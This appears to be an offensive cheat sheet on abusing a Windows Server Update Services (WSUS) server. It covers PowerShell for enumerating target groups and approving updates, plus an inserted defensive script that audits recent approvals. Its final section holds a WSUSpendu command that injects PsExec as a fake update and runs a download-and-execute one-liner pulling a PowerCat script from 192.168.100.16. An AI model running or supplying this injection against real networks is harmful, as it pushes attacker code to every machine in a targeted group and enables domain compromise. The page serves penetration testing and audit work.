
# WSUS server abuse

## Get all information about the database

```powershell
Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Update Services\Server\setup'
```

![](/files/EzplLzuSV4XovJdn06kV)

## Define $wsus

```powershell
[reflection.assembly]::LoadWithPartialName("Microsoft.UpdateServices.Administration")
$wsus = [Microsoft.UpdateServices.Administration.AdminProxy]::GetUpdateServer()
```

## View updates

```powershell
$update = $wsus.GetUpdates() | Select -last 1
```

## Get target groups

```powershell
$wsus.GetComputerTargetGroups()
```

![](/files/lO3JHjFGvjt5xf2EpC4E)

## Approve update

```powershell
#Pick a group to approve an update for
$group = $wsus.GetComputerTargetGroups() | ? {$_.Name -eq "Domain Servers"}

#Define the actions available for approving a patch
$all = [Microsoft.UpdateServices.Administration.UpdateApprovalAction]::All
$install = [Microsoft.UpdateServices.Administration.UpdateApprovalAction]::Install
$NotApproved = [Microsoft.UpdateServices.Administration.UpdateApprovalAction]::NotApproved
$Uninstall = [Microsoft.UpdateServices.Administration.UpdateApprovalAction]::Uninstall

#Approve the update
$update.Approve($install,$group)
```

### Using UpdateServices

```powershell
import-module -name UpdateServices
```

Approve the updates

```powershell
Get-WsusUpdate -Classification All -Approval Unapproved | Approve-WsusUpdate -Action Install -TargetGroupName "All Computers"
```
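
Every approval made through either method above is stored on the WSUS server with the approving account, the time and the target group, so it can be reviewed afterwards. The following is an added example, not part of the original page or of any tool it references: it lists recent approvals and separates out updates whose source is not Microsoft Update. The 30-day window, the variable names and the treatment of approval timestamps as UTC are assumptions.

```powershell
# Added example: audit recent WSUS approvals (run on the WSUS server as a WSUS administrator).
[reflection.assembly]::LoadWithPartialName("Microsoft.UpdateServices.Administration") | Out-Null
$wsus = [Microsoft.UpdateServices.Administration.AdminProxy]::GetUpdateServer()

# Assumed review window; approval timestamps are treated as UTC (assumption).
$since = (Get-Date).ToUniversalTime().AddDays(-30)
$msSource = [Microsoft.UpdateServices.Administration.UpdateSource]::MicrosoftUpdate

# One row per approval: who approved which update, for which group, and when.
$report = foreach ($u in ($wsus.GetUpdates() | Where-Object { $_.IsApproved })) {
    foreach ($a in $u.GetUpdateApprovals()) {
        if ($a.CreationDate -lt $since) { continue }
        [pscustomobject]@{
            Approved       = $a.CreationDate
            Admin          = $a.AdministratorName
            Action         = $a.Action
            Group          = $a.GetComputerTargetGroup().Name
            Title          = $u.Title
            Classification = $u.UpdateClassificationTitle
            Source         = $u.UpdateSource
            UpdateId       = $u.Id.UpdateId
        }
    }
}

# Full approval history for the window, newest first.
$report | Sort-Object Approved -Descending | Format-Table -AutoSize

# Approved updates that did not come from Microsoft Update deserve a manual look.
$report | Where-Object { $_.Source -ne $msSource } |
    Sort-Object Approved -Descending |
    Format-List Approved, Admin, Group, Title, UpdateId
```

Compare the `Admin` and `Approved` columns against change records; an install approval for a broad group such as "All Computers" or "Domain Servers" with no matching change ticket is the entry to investigate first.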

## Abusing WSUS server for domain compromise

Using [WSUSpendu.ps1](https://github.com/AlsidOfficial/WSUSpendu/blob/master/WSUSpendu.ps1)

```powershell
Wsuspendu.ps1 -Inject -PayloadFile c:\Windows\Temp\PsExec64.exe -PayloadArgs '-accepteula -s -d powershell.exe -c "iex(iwr -UseBasicParsing -Uri http://192.168.100.16/powercat_loaded.ps1)"'
```

## References

* <https://www.youtube.com/watch?v=2M8ux6ESIAs>
* <https://github.com/AlsidOfficial/WSUSpendu>
* <https://learn-powershell.net/2010/10/16/wsus-approving-and-declining-updates-with-powershell/>
